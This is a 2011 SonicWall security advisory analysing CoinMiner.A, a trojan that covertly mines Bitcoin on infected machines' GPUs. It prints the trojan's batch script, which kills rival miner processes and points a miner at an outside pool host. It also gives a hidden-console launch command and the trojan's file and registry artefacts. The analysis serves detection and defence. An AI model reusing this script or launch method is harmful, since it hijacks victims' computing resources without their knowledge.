SonicWall Security Center
Share: Linkedin Share Facebook Like
Back to SonicALERT


New GPU Bitcoin Miner Trojan spotted in the wild (Oct 6, 2011)



Description


The Sonicwall UTM research team received reports of a new Bitcoin Trojan in the wild. Bitcoin is a decentralized p2p crypto-currency. The process of generating (mining) bitcoins is computationally expensive and would take an impractical amount of time to generate a single bitcoin on a personal computer. If however, a hacker were able to compromise a handful of machines with fast parallel Graphics Processing Units it could turn into a very lucrative money making business. CoinMiner.A is a Trojan that attempts to fulfill this purpose.

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd
  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe
  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\mamatije5.exe [Detected as GAV: CoinMiner.A_2 (Trojan)]
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT2.exe [Detected as GAV: CoinMiner.A_3 (Trojan)]

hsbca.exe is non-malicious software from NTWind called Hidden Start. It is used to run batch files and other programs without a console window. It uses the following icon:

wuT2.exe uses the following icon:

3kal.cmd contains the following data:

      ping -n 40 google.com
      taskkill /f /im cgminer.exe
      taskkill /f /im svchoost.exe
      taskkill /f /im mamatije.exe
      taskkill /f /im mamatije2.exe
      taskkill /f /im mamatije3.exe
      taskkill /f /im yaaa3.2.exe
      taskkill /f /im WinMine.exe
      taskkill /f /im mamatije4.exe
      mamatije5.exe -a 59 -g no -o http://y.b{removed}.info:8332/ -u dxstr_miner -p hello -t 2

The Trojan adds the following keys to the Windows registry:

  • HKEY_CURRENT_USER\Software\WinRAR SFX C:\Documents and Settings\{USER}\Start Menu\Programs\Startup "C:\Documents and Settings\{USER}\Start Menu\Programs\Startup"
  • HKEY_CURRENT_USER\Software\WinRAR SFX C:\Documents and Settings\{USER}\Local Settings\Temp\acc "C:\Documents and Settings\{USER}\Local Settings\Temp\acc"

The Trojan attemps to open the following files:

  • C:\Documents and Settings\{USER}\Start menu\Programs\Startup\start.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\hahahahaha.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk2.exe

The Trojan uses hsbca.exe (Hidden Start) to run "3kal.cmd" via the following command:

      C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe "/NOCONSOLE C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd"

The Trojan runs the following command to ensure internet connectivity:

  • ping -n 40 google.com

As defined in "3kal.cmd" the Trojan runs taskkill.exe in an attempt to kill the following programs if they are loaded:

  • cgminer.exe
  • svchoost.exe
  • mamatije.exe
  • mamatije2.exe
  • mamatije3.exe
  • yaaa3.2.exe
  • WinMine.exe
  • mamatije4.exe

Our analysis determined that the Trojan uses Nvidia CUDA to employ the GPU (if present) to generate bitcoins:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CoinMiner.A (Trojan)
  • GAV: CoinMiner.A_2 (Trojan)
  • GAV: CoinMiner.A_3 (Trojan)



Back to top

Back to SonicALERT

Follow: Follow us on Facebook Follow us on Twitter Join the Conversation
#SonicWall
© 2018 SonicWall | Privacy Policy | Conditions for use | Feedback | Live Demo | SonicALERT | Document Library | Report Issues
Version: 13.24 | S2MSW04